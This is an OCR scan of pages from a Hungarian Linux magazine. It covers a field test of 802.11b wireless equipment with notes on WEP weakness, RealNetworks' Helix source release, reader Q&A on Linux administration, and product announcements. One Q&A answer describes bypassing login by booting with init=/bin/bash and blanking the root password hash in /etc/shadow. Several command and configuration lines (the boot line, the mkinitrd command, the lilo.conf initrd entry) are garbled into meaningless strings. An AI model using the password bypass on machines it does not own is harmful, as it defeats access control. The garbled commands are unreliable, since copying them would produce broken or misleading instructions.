jelszó begépelése után rendszerünket használatba 
vehetjük. 


Üdvözöljük a SuSE Linux 8.1-ben! 
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Gibizer Tibor 
(gibzo(olinuxmania.hu) 

újságíró, immár hét éve a Linux 
elkötelezett híve. Imádja a kutyákat, 
a kerékpározást és az autós 
csavargást. 
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Dróttalan utakon 


Unos-untalan a vezeték nélküli — illetve, hogy pontosabb 
legyek, a rádiós — hálózatok térnyeréséről hallunk, ám 
rengeteg a félreértés a témával kapcsolatban. Sokan 
hajlamosak arra, hogy egyfajta csodaként tekintsenek 
az egyre barátságosabb árúvá váló rádiós eszközökre, 
amelyek akár a vezetékes számítógépes hálózatok teljes 
kiváltására is alkalmasak. Sőt, internetszolgáltatás is 
indítható segítségükkel, legalábbis erre utal a gomba 
módra szaporodó vállalkozások száma, amelyek rádiós 
hálózat telepítését ígérik szerte az országban. 

Rádiós hálózat alatt a továbbiakban az IEEE 802.11b 
szabvány szerinti eszközöket értjük. Fontos jellemzőjük, 
hogy üzemeltetésük engedélyhez nem kötött, mivel 

a szabadon használható 2,4 GHz-es, pontosabban a 

24 000—2,48335 GHz frekvenciatartományban működnek. 
Legnagyobb átviteli sebességük 11 Mb/s. Nem keve- 
rendők össze az 5 GHz-es eszközökkel, amelyek szintén 
a nagyon hasonló jelzésű 802.11a szabvány szerint mű- 
ködnek, lényegében még sincsenek köszönő viszonyban 
a 802.11b szabvány szerinti termékekkel. A két megol- 
dás közti különbségek a rádióamatőrökön kívül valószí- 
nűleg senki szívét nem dobogtatják meg, így elégedjünk 
meg annyival, hogy a 802.11a szabvány nem a 802.11b 
feljavított változata; teljesen más megoldásokat használ, 
és jóval, akár tízszer nagyobb átviteli sebességekre is 
képes lehet. 

Az esetleges vásárlásnál fontos összehasonlítási alap 
lehet az eszközök adóteljesítménye, így erről is érdemes 
említést tenni. A szabvány akár 1 wattos teljesítményt 
is megenged, ám a ténylegesen kapható termékek jel- 
lemzően még a közelébe sem kerülnek. Ennek oka egy- 
részt az, hogy a jellemzően mobil készülékekben használt 
kártyáknak takarékoskodniuk kell az akkumulátor tölté- 
sével, másrészt az apró antennák túlzott melegedését is 
el kell kerülni. Nagyobb teljesítménnyel nagyobb távol- 
ság hidalható át, ám ebben az esetben érdemes lehet 
irányított antennával próbálkozni, amit sokféle minőség- 
ben és árban be lehet szerezni. Sőt, a Weben turkálva 
még konzervdobozból vagy tortasütőből készült anten- 
náról is találni képet, tehát a házi barkácsolás előtt 
szintén nyitott az út. 

Rádiós termékeket többféle célra és kivitelben érhetünk 
el. A két legismertebb eszköztípus a hozzáférési pont 
(Access Point — AP) és a rádiós kártya. Az utóbbit első- 
sorban mobilgépekhez, PCMCIA kivitelben készítenek, 
illetve olyan PCI-PCMCIA foglalatkártyát is be lehet sze- 
rezni, amelynek segítségével a féltenyérnyi eszközt asz- 
tali gépekbe is beépíthetjük. A legtöbb gyártónál már 
PCI kártya is kapható, de — mint kollégáimmal megálla- 
pítottuk — ezek alighanem csak annyiban különböznek 

a mobilváltozattól, hogy ugyanazt az elektronikát más 
áramkörre építették, illetve lecsavarható és dönthető 
antennát kaptak — legalábbis a Linksys-termékek eseté- 
ben. Az utóbbinak fontos előnyei vannak, ezt később 
látni fogjuk. 

A kipróbálásához használt kisebbfajta kupacot az Alpha- 
sonic Kft. raktáraiból zsákmányoltuk. Kaptunk két 


PCMCIA kártyát, egy PCI kártyát, két egyszerűbb irányí- 
tott antennát, egy hozzáférési pontot, illetve megfelelő 
antennakábeleket. Először úgy gondoltuk, hogy egy 
ekkora felszereléssel mindent ki tudunk próbálni, ami 
rádiós hálózattal elképzelhető — hamarosan kiderült 
azonban, hogy ehhez jókora, lehetőségeinket meghaladó 
gépparkot kellene felvonultatni, és sokkal több eszközre 
lenne szükség. A lényegre azonban így is fény derült. 

A rádiós eszközöket többféle hálózat kialakításához hasz- 
nálhatjuk. Legegyszerűbb esetben , ad hoc", más néven 
,Peer-to-peer" hálózatot létesítünk, amelyben a rádiós 
kártyával felszerelt egyenrangú gépek közvetlenül egy- 
mással veszik fel a kapcsolatot, és jellemzően nincs köz- 
ponti kiszolgáló. Ez például egy Microsoft Networking- 
alapú hálózat létrehozásához roppant egyszerű és kényel- 
mes megoldás, bár alkalmazási köre véleményem szerint 
az egyszerűségéhez fogható mértékben egyben szűk is. 
Az egyenrangú hálózatot AP segítségével terjeszthetjük 
ki, bár ekkor már nem teljesen egyenrangú hálózatról van 
szó. Ilyenkor minden kártya az AP-hoz csatlakozik, és 
mivel az AP egyben hagyományos, 10/100 Mb/s sebes- 
ségű ethernetkapcsolat létesítésére is képes, az esetleg 
már meglévő ethernethálózat tagjai is elérhetővé válnak. 
Mérnöki-tervezési szempontból sokkal izgalmasabb, ha 
nagyobb területet kell hálózati eléréssel lefedni. Ilyenkor 
egymás hatósugarába érő hozzáférési pontokat kell 
telepítenünk, amelyek — bár önállóan nem csatlakoznak 
az ethernethálózatra, de — kiterjesztik az ethernetvezeték 
nélküli átjárást biztosító AP által elért területet. Ilyen 
módon a mobiltelefonos rendszereknél megismerthez 
hasonló cellák jönnek létre, amelyek között a számítógé- 
pek, az ügyfelek teljesen észrevétlenül barangolhatnak. 
Gyakorlati szempontból nem kevésbé fontos alkalmazási 
terület, ha két, egymástól távol lévő gépet vagy hálóza- 
tot kel összekötni egymással, lehetőleg elviselhető nagy- 
ságú költséggel. A távolságnak nem is kell olyan nagy- 
nak lennie, gondoljunk csak két panelházra, amelyek egy 
forgalmas út két oldalán emelkednek. Fémkábelt kihúzni 
villámvédelmi megfontolások miatt nem ajánlatos, az 
optika lefektetése átlagember számára a költségek és 

a szükséges engedélyek miatt kivitelezhetetlen, a lézeres 
megoldások ára pedig valahol egymillió forint felett 
indul. Marad tehát a rádiózás, amit többféle összeállítás- 
ban Is beüzemelhetünk. 

Ha egy központi hálózatra kell egy kisebb, önálló hálózat- 
részt ráfűznünk, a távoli AP-t ügyfélmódba kapcsolva 

az egyedül a központi AP-vel fog kapcsolatot létesíteni. 
A központi APt-t fizikai cím alapján adhatjuk meg és 
azonosíthatjuk. 

Ha kifejezetten két hálózatot akarunk összekötni, mind- 
két oldalon vezeték nélküli hídmódba célszerű kapcsolni. 
Ekkor a két AP csak egymással tart kapcsolatot, egyéb 
vezeték nélküli eszközök nem léphetnek fel a segítségük- 
kel a hálózatra. 

Hasonló összeállítást több hálózatrésszel is létrehozha- 
tunk, ilyenkor az egyik AP pont-multipont kapcsolatot 
tart fenn a többivel, amelyek pont-pont összekötte- 
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tésben állnak a lényegében központinak kijelölttel. Logi- 
kailag az egész hálózat egynek látszik, ám érdemes 
ügyelni arra, hogy a rádiós eszközök sávszélessége 
korlátozott, és mivel a csatolt hálózatok egymással nem 
állnak közvetlen kapcsolatban, egymás közötti forgalmuk 
hamar telítheti a hálózatot. 

Ugyan a hozzáférési pontok a legnagyobb teljesítményű 
eszközök a választékban, hatótávuk még nyílt területen 
sem haladja meg — gyári adat szerint — a 457 métert. 
Irányított antennákkal ezt jelentősen, akár több kilomé- 
ternyire is növelhetjük. Antennát sokféle minőségben, 
kivitelben kaphatunk — mindig az adott körülményeknek 
megfelelően kell kiválasztani a megfelelőt. Nem árt 
figyelembe venni azt is, hogy hiába a kiváló antenna, ha 
túlságosan messzire akarjuk tőle vezetni a jelet: ekkor az 
antennakábel csatlakozásain, illetve a magán a kábelen 
elvesztett jelerősség miatt hamar semmivé válik az 
antennával elért nyereség. 

A különálló antennát a hozzáférési pont vagy a PCI-os 
kártya lecsavarható saját antennájának helyére csatla- 
koztathatjuk. Ebből következik, hogy ha két hálózatot, 
netán csupán két gépet kell összekötnünk, mindkét 
oldalon egy-egy PCI-os kártyával és egy-egy antennával 
már megoldhatjuk a dolgot; ráadásul anyagilag is így 
járunk a legjobban. Ha valamelyik oldalon több gép is 
van, akkor elég egy második — ethernetkártyát telepíteni 
a rádiózó gépbe, és gondoskodni a hálózati csomagok 
továbbadásáról a többi felé. 

A hordozható gépekbe szánt PCMCIA kártyák sajnálatos 
hátránya, hogy az antennájuk nem szedhető le, így külső 
antennával nem használhatók. Személy szerint el tudnék 
képzelni egy kisméretű, a gép oldalára csíptethető kis 
antennát, de a választékot áttekintve úgy tűnik, csak 
nekem ilyen élénk a fantáziám, vagy valamilyen műszaki 
akadálya van a dolognak. 


A fontosabb beállítások 

A 802.11b hálózatok több csatorna használatát is lehető- 
vé teszik. Ezzel kapcsolatban a legfontosabb tudnivaló 
az, hogy az egy hálózatba kerülő készülékek mindegyi- 
kének ugyanazt a csatornát kell használnia. Európában 
elvileg 13, az Egyesült Államokban és Kanadában 

11 csatornát használhatunk — feltéve, hogy az illesztő- 
program ezt felkínálja. 

A hálózat pontosabb azonosítását szolgálja az SSID azo- 
nosító, amely tetszőleges karaktersorozat lehet, de a 
hálózat minden tagjánál ugyanazt kell megadni. Amikor 
egy géppel fel akarunk lépni a hálózatra, és több hálózat 
is elérhető, ennek alapján könnyedén kiválaszthatjuk, 
hogy melyiket akarjuk használni. 

Egyenrangú hálózatot az , ad hoc" módot választva tudunk 
építeni, ilyenkor a számítógépek keresik egymást. Ha AP- 
vel is rendelkezünk, , infrastruktúra" módba kell váltanunk, 
ekkor a gépek nem egymással létesítenek kapcsolatot, 
hanem a hozzáférési pont elérésével próbálkoznak. 

Az illesztőprogramot jobban áttúrva további beállításokat 
is találunk, amelyek például a csomagok késleltetésére 
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vagy méretére vonatkoznak. Ha alapbeállításokkal is 
működik a rendszer, jobban tesszük — mint mindig —, 
ha nem bántjuk őket. 


Gyakorlat 

A kipróbáláshoz adott kupac átvétele után egy közeli 
irodába fuvaroztuk, ahol a meglévő 10/100-as ethernet- 
hálózat mellett már várt ránk egy előre kijelölt asztali, 
illetve két hordozható számítógép. Az asztali gépen 
Windows ME, az egyik hordozható gépen Windows 
2000, a másikon Windows XP volt. Linux — ekkor még — 
csak a helyi kiszolgálón futott, de ebbe érthető okokból 
nem akartunk belenyúlni. 

Az illesztőprogram telepítése mindegyik gépen fájdalom- 
mentes volt, és a kezdeti beállítások megadása után 
azonnal meg is találták egymást, illetve a hozzáférési 
pontot. Bosszantó kivétel volt ez alól a Windows 2000-es 
gép, amely számunkra érthetetlen módon kizárólag , ad 
hoc" módban volt hajlandó működni, a hozzáférési pontot 
nem akarta látni. Érdemes kiemelni a Windows XP kiváló 
vezeték nélküli hálózat támogatását — tudom, egy linuxos 
újságban ilyet leírni vétség, de ettől még tény marad. 

Az első helyszínről annyit érdemes tudni, hogy egy eme- 
letes, körfolyosós társasház, ám viszonylag fiatal épület, 
így normál falvastagsággal épült. Az iroda négy szobából 
állt, ezekben bolyongtunk, illetve a ház folyosóján és az 
utcán sétálva próbáltuk felmérni, hogy milyen messzire 
távolodhatunk el a többi géptől vagy az AP-tőól anélkül, 
hogy a kapcsolat megszakadna. Az irodán belül nem volt 
gond, ám a földszintre érve a majdnem fél méter vastag- 
ságú vasbeton födém már túl nagy akadályt jelentett 

a jelek számára. Az utcára kiérve a kapcsolat újból felé- 
pült, a rádióhullámoknak ekkor egyetlen falat és néhány 
méternyi szabadtéri távot kellett leküzdeniük. A háztól 
távolodva körülbelül 20-30 méternyit sétálhattunk úgy, 
hogy egyéb akadály nem került a két gép közé. Ha újabb 
ház sarka mögé bújtunk, az összeköttetés métereken 
belül megszakadt. Ha a ház körfolyosóján indultunk el, 
két fal került közénk és a túloldali eszköz közé. A folyo- 
són nagyjából 15 méternyire távolodhattunk el, ám 
ekkor annyira az adók-vevők teljesítményének határára 
értünk, hogy kezünket az antenna közelébe tartva is le 
tudtuk árnyékolni a jelet. Azt a megállapítást tettük 
tehát, hogy egy négy-öt helységből álló irodát és egy 
kisebb udvart ki lehet szolgálni egyetlen AP-vel, ám arról 
szó sem lehet, hogy egy nagyobb épületben ,ad hoc" 
hálózatot építsen ki valaki, illetve egyetlen AP-vel min- 
denkit ki tudjon szolgálni. 

A hálózati egységeket az alapértelmezett 11 Mb/S se- 
bességnél kisebb sebességgel is lehet használni, ilyen- 
kor állítólag növekszik az áthidalható távolság. Ez volt 

az a dolog, amit nekünk nem sikerült összehozni; hiába 
szabályoztuk a hálózati kártyát és az AP-t 1 Mb/Ss 
sebességre, a már kitapasztalt pontokon túlhaladva 

a kapcsolat ugyanúgy megszakadt. 

Második helyszínünk egy vidéki, faluszéli családi ház 
volt, az egyik antenna e ház tornácának az oszlopára 
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került. Alatta egy linuxos gép csücsült a PCI-os kártyával, 
az antennát a kert mögött elterülő szántóföld felé irányí- 
tottuk, miközben expedíciós járművünk — Daewoo Ma- 
tiz — motorja halkan duruzsolva várta a tortasütők kipró- 
bálásának megkezdését. A jármű csomagtartójába egy 
1000 wattos szünetmentes tápegység került, ez biztosí- 
totta a hozzáférési pont áramellátását, a második torta- 
sütőt kézzel tartottuk ki az ablakon, miközben a jármű- 
ben tartózkodó személyzet az egyéb felszerelések — gáz- 
pedál, kormány, hordozható gépek — kezelését végezte. 
Elsőként a viszonylag közeli, körülbelül 250 méterre 
található vízfolyás töltésére kapaszkodtunk fel. Innen 
remekül működött a kapcsolat, de ezt el is vártuk, hiszen 
az antenna névlegesen nagyjából 900 méterig használ- 
ható. Kicsit felbátorodva jóval messzebbre, körülbelül 
1,5 kilométerre távolodtunk el, ám itt már szembesül- 
nünk kellett azzal a súlyos akadállyal, hogy még a Kisal- 
földet is vízfolyások, kisebb-nagyobb bukkanók és egyéb 
tereptárgyak tarkítják, amelyek két szempontból jelen- 
tenek gondot: egyrészt árnyékolják a jelet, másrészt 
ekkora távolságról nem is olyan egyszerű megállapítani, 
hogy hol van a másik antenna, és merre kellene a ma- 
gunkkal hurcolt példányt tartó személynek fordulnia. 

A szomszéd falu szélén árválkodó, szebb napokat is 
látott autó maradványaira hiába kapaszkodtunk fel, csak 
a falusiak értetlenkedő tekintetét vonzottuk, a közeli ben- 
zinkút tetejére pedig már nem mertünk felkéredzkedni. 
Úgy döntöttünk tehát, hogy közelíteni fogunk kiinduló- 
pontunkhoz. Sportosan bevágódtunk egy újabb földútra, 
majd némi tarlón átgázolva kockáztattuk a terepjárónak 
éppenséggel nem nevezhető expedíciós jármű épségét, 
és egy újabb vízfolyás töltésére másztunk fel. Ekkor már 
lassan lebukott a nap, sugarai aranyló színűre festették 
a tájat, és a vadvilág lényei — kivéve a szúnyogokat — is 
lassan nyugovóra tértek, ám mi ebből semmit nem vet- 
tünk észre, hiszen visszaérkezett az első ping-csomag! 
Némi állítgatás — ,ne mozgasd", ,most jó", ,vissza" — 
után biztos kapcsolatot sikerült létesíteni az ekkor nagy- 
jából 1100 méterre lévő bázissal. Ha ügyesen tartottuk 
az antennát, a ping-csomagok 50 ms alatti késleltetéssel 
fordultak meg. Némi szöszmötölés után másolni is pró- 
báltunk, először úgy, hogy a hordozható gép is vezeték 
nélkül csatlakozott a hozzáférési ponthoz. Mivel ekkor 

az adatforgalom kétszeresen foglalta a sávszélességet 

— hordozható gép-AP és AP-bázis viszonylatban —, 
200-500 Kb/másodperc fölé nem sikerült mennünk. 
Amikor ethernetalapú kapcsolatot létesítettünk az AP és 
a gép között, a sebesség a kétszeresére ugrott, így sike- 
rült a gyári értékek közelébe kerülni. Az eredménnyel 
rendkívül elégedettek voltunk, hiszen az antennához 
megadott 900 méteres távolságon túlra sikerült biztos 
és viszonylag nagy sebességű kapcsolatot létesítenünk. 


Linux alatt 

Linuxhoz — szinte természetes — csak félig-meddig jár 
támogatás. Pontosabban az van, amit a közösség megír 
magának, a tisztelt gyártók nem nagyon fárasztják 


magukat illesztőprogramok fejlesztésével. A linux-vwlan 
tervezet résztvevői szerencsére megteszik ezt helyettük, 
az általuk fejlesztett illesztőprogram jó néhány gyártó 
termékeit támogatja, köztük a Linksys egyes kártyátit is. 
Az újabb változatai folyamatosan megjelennek, az 

2 ftp.linux-wlan.org címről szabadon letölthetők. Az illesz- 
tőprogram lefordítása után csak annyit a dolgunk, hogy 

a már említett beállításokat egy szöveges beállítófájlban 
megadjuk. Lehetőleg ne nagyon lapozzunk lejjebb benne, 
mert elképesztően sok beállítást tartalmaz, és ezek jelen- 
tőségére 99 százalékban nem sikerült rájönnünk. Igaz, 
nem is volt rájuk szükség, a hálózat remekül működött. 

A linuxos megoldás fontos kényelmi szolgáltatása, hogy 
a hálózati kapcsolatot megszakadása után önműködően 
újraépíti, ha észleli a túloldal jeleit. A windowsos válto- 
zat ezzel szemben egy ablakot dob fel, amelyben SSID 
szerint felsorolja az elérhető hálózatokat, és a felhasználó 
dolga kiválasztani közülük a megfelelőt. Ha több hálózat 
van a közelben, ennek a megközelítésnek is lehetnek 
előnyei, de ha a felhasználó a lefedett terület határán 
mozog, és percenként szakad meg és áll helyre a 
kapcsolata, Windowst használva bizony percenként kell 
kattintania a kívánt hálózatra. 


Biztonság 

A vezeték nélküli eszközök beépített titkosítás használa- 
tára képesek, és ezt a lehetőséget ajánlott is engedé- 
lyezni, hiszen ha semmiféle védelmet nem használunk, 
bárki, aki venni tudja a rádióhullámokat, lehallgathatja 

a hálózati forgalmat. A Wired Eguivalent Protocol (WEP) 
használatát telepítés után minden eszközön külön kell 
engedélyezni, és meg kell adni azokat a kulcsokat, ame- 
lyek alapján a titkosító algoritmus elvégzi a csomagok 
rejtjelezését. Jó tisztában lenni viszont azzal, hogy a 
WEP csak megnehezíti a támadók dolgát, teljes bizton- 
ságot nem nyújt: már elérhetők olyan nyílt forrású prog- 
ramok, amikkel különösebb hozzáértéssel nem rendelke- 
ző személyek is támadást intézhetnek a hálózat ellen. 
Az Interneten matematikai részleteket is taglaló tanul- 
mányt is lehet találni; a lényeg az, hogy kellő számú 
csomagot lehallgatva egyre nő annak esélye, hogy a 
támadó ki tudja találni a kulcsokat. Ajánlott tehát maga- 
sabb szintű rejtjelezési megoldásokat — IPSec, SSH — is 
használni, illetve a hálózat tervezésénél is figyelembe 
venni a vezeték nélküli eszközök által jelentett veszélyt, 
és külön tűzfallal szigetelni el a hozzáférési pontot is. 
További bosszúság forrása, hogy a kulcsokat minden 
eszközön — egyenként és azonosan - be kell állítani, 
terjesztésük és eltitkolásuk tehát külön gondot jelent 

a rendszergazda számára. 


Medgyesi Zoltán (mz€rettesoft.hu) 

a BMGE 24 éves informatika szakos hallgatója. 
Szabadidejét legszívesebben a barátnőjével tölti. 
Szeret autózni és bográcsban főzni. A Linuxot hat 
éve Ismeri, de még nem volt lelkiereje, hogy 
áttérjen rá. A Linuxvilág magazin hírszerkesztője. 
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Rob Glaser, a Microsoft volt felső szintű vezetője által alapított 
RealNetworks egy erősen szabadalmazott médiafolyam-üzlet, 
amely igazodni látszott a Microsoft mintájához. Mégis, a 
RealNetworks legnagyobb vetélytársa éppen a Microsoft, amely 
egyre növekvő erőszakossággal nyomul ezen a területen. 
Júliusban a RealNetworks meglepő stratégiát mutatott: programjuk 
egy részét nyílt forrásúvá tette. 

A Real-kodekek még mindig csak szigorú szabadalmi szerződések 

alapján hozzáférhetők. Amikor az OReilly Nyílt Forráskód Kong- 

resszuson — a RealNetworks Ogg Vorbis-támogatásának bejelen- 
tésekor — Rob Glaserrel beszélgettem, a kodekek szerepét a cso- 
magoláséhoz hasonlította egy szállítmányozási rendszerben. 

A RealNetworks feladata a bitek szállítása és nem a csomagolása 

— magyarázta. Az ügyfelek használhatják a Real saját tömörítését, 

vagy bármelyik másik számukra megfelelőt, akár az Ogg Vorbist, 

a OuickTime-ot, a Windows Media Playert és a többit. 

írásom időpontjában két felhasználási szerződés létezik: egy véd- 

jeggyel ellátott, a RealNetworks közösségi forráskód szerződés 

(RealNetworks Community Source License — RCSL), amelynek 

,Sszerkezete biztosítja, hogy minden RCSL alatt létrehozott termék 

illeszkedni fog a Helix csatolófelületeihez"; és a RealNetworks 

nyilvános forráskód szerződés (RealNetworks Public Source 

License — RPSL), amelynek felépítése , a fejlesztőknek nagyobb 

rugalmasságot biztosít a forráskód használatában". Az utóbbi a 

GPL-hez , hasonlónak" mondott annyiban, hogy elfogad bizonyos 

copyleft-kitételeket (copyleft: általános eljárás programok ingye- 

nessé tételére), de különbözik bizonyos , szabadalmazott kiadások" 
terén. A cég különböző szabadalmak és szabadalmaktól függő 
alkalmazások használatára is jogosítványt ad a Helix-közösségnek. 

A nyilvánosságra hozatal után Bruce Perens közzétette a Real- 

Networks ezzel kapcsolatos terveinek részletes elemzését. Ezt írja: 

e . A RealNetworks kiszolgáló és ,kódolóegység" a valódi kodekek 
nélkül a ,közösségi forráskódok" engedélye alá fog tartozni. Ez 
azt jelenti, hogy a forráskód nyilvános lesz azok számára, akik 
aláírnak egy megállapodást, de ők sokkal kevesebbet kapnak 
majd, mint a nyílt forráskóddal együtt járó teljes jogosultság. 
Mivel a többi kiszolgáló és kódoló már teljesen nyílt forráskódú, 
valószínűleg a Nyílt Forráskód Közössége sem vár el többet 
a RealNetworks kódjainak e részével kapcsolatban. 

e — A RealAudio- és RealVideo-kodekek lefordított formában lesz- 
nek hozzáférhetőek, mint olyan programok, amelyeket na- 
gyobb termékekhez lehet illeszteni. Hangsúlyozom: nem csat- 
lakozunk az ingyenes programok táborához. Mindamellett ezek 
a kodekek hozzáférhetőek lesznek a Real által kibocsátott kü- 
lönböző nyílt forrású részekkel együtt, így egy harmadik fél 
számára egyszerűbbé válik félig szabadalmazott Real formá- 
tumú lejátszót Linux vagy más operációs rendszerek alá létre- 
hozni, ahol ez ma még nem támogatott. 

A bejelentés elkerülhetetlenné teszi a Netscape Mozillával 

kapcsolatos 1998-as lépésével való összehasonlítást, ami után az 

1.0 változat elkészítéséig több mint négy év telt el. , A Mozillával 

ellentétben mi nem tervezzük, hogy mindent az alapoktól kezdve 

újraírunk" — közölte velem levelében egy Real-alkalmazott. 
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A Linux Journal honlapján 
számtalan gond megoldá- 
sához találhattok további 
segítséget. A Sunsite 
tüköroldalait, a gyakran 
feltett kérdéseket és az 
egyéb útmutatásokat a 

2 www. linuxjournal.com 
honlapon olvashatjátok el. 
A rovatban közzétett 
válaszokat Linux-szakértők 
kis csapata készítette el. 
lovábbi kérdéseiteket 
szívesen fogadják 

(angol nyelven) a 

2 www.linuxjournal.com/ 
[7-issues/techsup.htmi 
címen, ahol csak egy 
kérdőívet kell kitöltenetek, 
de a btis(ossc.com címre 
levelet is írhattok. A levél 
tárgyában szerepeljen 

a ,BIS" kulcsszó. 
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A hónap szakmai tanácsai 


Elveszett felhasználónév 
Számítástechnika órán kaptam egy Linuxot. Par- 
tition Magicet használok, de elfelejtettem a be- 
jelentkezéshez használt nevet, amelyet az órán 

használtam. Hogyan tudok ismét belépni? 
Santos Gonzales, sansan78228(oyahoo.com 


Feltéve, hogy a LILO indítja a rendszert, 
egy apró trükk segítségével beléphetsz. 
Rendszerindításkor írd be a rendszer- 
indító lenyomat nevét (a TABULÁTOR bil- 
lentyű megnyomásával a lenyomatok 
listája kiíratható, ha nem tudnád a 
nevüket), és írd utána az 
init-/bin/bash karakterláncot. Például: 
HT ETKO SZ e sea e—/ bin/bash 
Ezután a /etc/shadow fájlt szerkeszd át úgy, hogy a rend- 
szergazdai jelszót tartalmazó sorban az első és a máso- 
dik kettőspont között mindent kitörölsz. Mentsd a fájlt, 
és indítsd újra gépet. Jelentkezz be rendszergazdaként 
(nem lesz jelszava), és a jelszót azonnal állítsd be a 
passwd paranccsal. 
Ben Ford, bencokalifornia.com 


Működni fog valamikor a winmodemem? 
Nemrég telepítettem a Red Hat 7.3-at Intel Pentium III 
processzorral rendelkező Dell gépemre. Megpróbáltam 
beállítani a betárcsázós kapcsolatot, de a Linux nem 
ismerte fel a modemet. Lucent winmodemem van. 

Vijay Jilledimudti, jvkvijayohotmail.com 


A winmodemeket csak a megfelelő illesztőprogrammal 
lehet használni (ha van ilyen). Látogass el a 

2 http://www.linmodems.org webcímre, ahol megtud- 
hatod, hogy a te lapkakészleted támogatott-e. 

Mario de Mello Bittencourt Neto, mneto(oargo.com.br 


Külső SCSI-lemezzel 

rendelkező rendszer frissítése 

Van egy 133 MHz-es noteszgépem, Red Hat 6.0 fut 
rajta, és a gépen belül csak a / fájlrendszer található 
meg. A /home könyvtár egy külső SCSI-lemezen foglal 
helyet, amely egy Adaptec 1460-as kártyán keresztül 
csatlakozik a géphez. A rendszermagot 2.2.5-15-ről 
2.4.5-re szerettem volna frissíteni. Frissítettem a 2.4-es 
rendszermagokhoz feltétlenül szükséges programokat 
(pl.: modutils 2.4.16 stb.), de gondjaim támadtak. 
Miután a make és make instal11 parancsokat a 
modutils csomagra kiadtam, és újraindítottam a 
gépet, nem tudtam sem a külső SCSI-lemezt, sem a 
zipmeghajtót elindítani. A hangkártya sem működik. 
Roger Martinez, roger.martinezofreesbee fr 


A mkinitrd parancsot használd, és készíts egy lenyo- 
matot, amely a SCSI-modulokat is tartalmazza. Az új 
rendszermag lefordítása és telepítése után írd be az 
meinterd /6DOCE/TOTEÉd 245 ag 255 
parancsot. Ellenőrizd, hogy a számok megegyeznek-e 

a rendszermag változatszámával, és a /etc/lilo. conf-hoz 
add hozzá a következő sorokat: 





image-/boot/vmlinuz-2.4.5 
label-linux 
Tt evde/DboCESTnT esd 45 ang 
read-only 
root-/dev/ xxx 

Futtasd a LILO-t, és indítsd újra a gépet! 

Mario de Mello Bittencourt Neto, mnetok(oargo.com.br 


Linux Home Router 

Nemrég telepítettem a Red Hat 7.2-t, és egy másik 
gépem is van, amin Windows 98 fut és egy Cox-ohome 
kábelmodemhez csatlakozik. Az internetkapcsolatot a 
linuxos gépre szeretném költöztetni, majd 
útválasztóként, tűzfalként és DHCP-kiszolgálóként 
használni. A DHCP-kiszolgáló azért kellene, mert meg 
akarom tanulni a beállítását és a működtetését. Nagyra 
értékelném, ha megmondanátok, mi az első lépés, vagy 
mi az egyes lépések fontossági sorrendje. 

Mike Dickson, mjd42970(0co0x.net 


Az első lépés a tűzfal beállítása. Be kell állítanod az 
útválasztó-védelmet és az IP-álcázási szabályokat 

(a Windows 98-es géphez). Kezdetben valószínűleg 
grafikus felületű eszközt érdemes használnod, bár hamar 
ki fogod nőni. A Red Hat grafikus beállítóprogramjának 
neve: firewall-config. 

A második lépés a DHCP-kiszolgáló beállítása. Olvasd el 
a DHCP mini-Howro-t a 5 http://www.tldp.org/HOWTO/ 
mini/DHCP/index.html címen. 

Ennyi elég is az útválasztóról. Még sok érdekes dolgot 
be lehet állítani, például saját levélkiszolgálót és 
webkiszolgálót, de első feladatnak ez is megteszi. 
Ahogy nézem, ezt a projektet te magad szeretnéd végig- 
vinni, mert érdekel a dolog. Ha nem ez a helyzet, inkább 
egy előre elkészített LRP-lemez vagy egy Linksys útmu- 
tató használatát javaslom. 

Christopher Wingert, cwingerteogualcomm.com 


Kettős rendszerindítás Slackware-rel 

Két merevlemezem van, a C: 8 gigabájtos, és minden 
ezen van. A másikat két részre osztottam, D: és E: meg- 
hajtókra. Mindkét meghajtó 9 GB-os, és az egyikre 
Linuxot szeretnék telepíteni. Telepíthető-e a Slackware 
a D: meghajtóra? A rendszerindításkor kiválaszthatom-e 
az indítani kívánt operációs rendszert? 

Eamonn Kiely, eamonnkiely 198-ohotmail.com 


Természetesen igen, telepíthető. Előtte mindenképpen 
olvasd el a leírást, mert új felhasználóknak a Slackware 
nem a legkönnyebb terjesztés. Inkább a Madrake, SuSE 
vagy Red Hat terjesztéseket javaslom. Ezek telepítés 
közben maguktól felismerik a lemezeiden elhelyezkedő 
lemezrészeket, és segítenek a megfelelő lemezrész kivá- 
lasztásában (amit te D: és E: meghajtóknak hívsz, való- 
jában lemezrészek; a Windowsban virtuális meghajtók- 
nak látszanak). 

Ben Ford, bencokalifornia.com 
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Ch 3.0 

A Ch 3.0 felületfüggetlen és beá- 
gyazható C/C -- --értelmező. Támo- 
gatja az IS50 C szabványt, a C-t --- 
osztályokat, a POSIX-et, a GTIK-t-t, 
a Windowst, az OpenGL-t, az X/Moti- 
fot és a socket/Winsockot, továbbá 
nyolcezernél is 
több függvénnyel 
bír. A Ch 3.0 sok 
tekintetben bővíti 
ki a C nyelvet, 
többek között 
támogatja a rendszerfelügyeleti célú 
héjprogramozást, vannak általános 
függvények, karakterlánctípus, line- 
áris algebrai és mátrixszámításokban 
használható tömbök, két- és három- 
dimenziós rajzolás, és osztályok a 
CGI-hez. Fejlett numerikus matema- 
tikai függvénykészlettel rendelkezik 
lineáris rendszerek, differenciál- 
egyenletek, nemlineáris egyenletek 
számításához és Fourier-analízishez. 
Adatok: Softintegration, Inc., 

e-mail: info(-rDsoftintegration.com, 
2 http:/Awww.softintegration.com 


VersaTRAK IP RTU 

Megjelent a SIXNET Linux-alapú 
VersaTRAK IP RTU-ja (távoli ter- 
minálegység). Az RTU 32 bites 
PowerPC processzorral, 16 MB 
gyors dinamikus memóriával és 
4—126 MB flashmemóriával rendel- 
kezik. Az eszköz adatgyűjtésre, 
adatnaplózásra és vezérlési felada- 
tokra használható. A felhasználói 
programok elkészítésére használha- 
tóak az iparban elterjedt eszközök 
vagy a szabad Linux-fordító. A Ver- 
sal RAK IP egy 10/100-as ethernet- 
kapuval és négy soros kapuval ren- 
delkezik. Támogatja a telefonos, a 
rádiós és RS-485 vonalat használó 
eszközöket, amelyeket egy RISK társ- 
processzor kezel, és helyi, ethernet 
és Modbus I/0-modulok kombiná- 
ciójával több mint 50 000 [I/0-vonalat 
tud lekérdezni. A megosztott erőforrá- 
sok adatbázisát nem Linux-alkalmazá- 
sokból is el lehet érni. Az eszközhöz 
a tervezés, beépítés és telepítés 
megkönnyítése érdekében fejlesztő- 
és karbantartó eszközök is járnak. 
Adatok: SIXNET, 331 Ushers Road, 
e-mail: sales(osixnetio.com, 

2 http:/Awww.sixnetio.com 
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64Express 

A 64Express segédprogram képes 

a 32-bites C és C-- ---alapú progra- 
mokat önműködően, kézi kódátvitel 
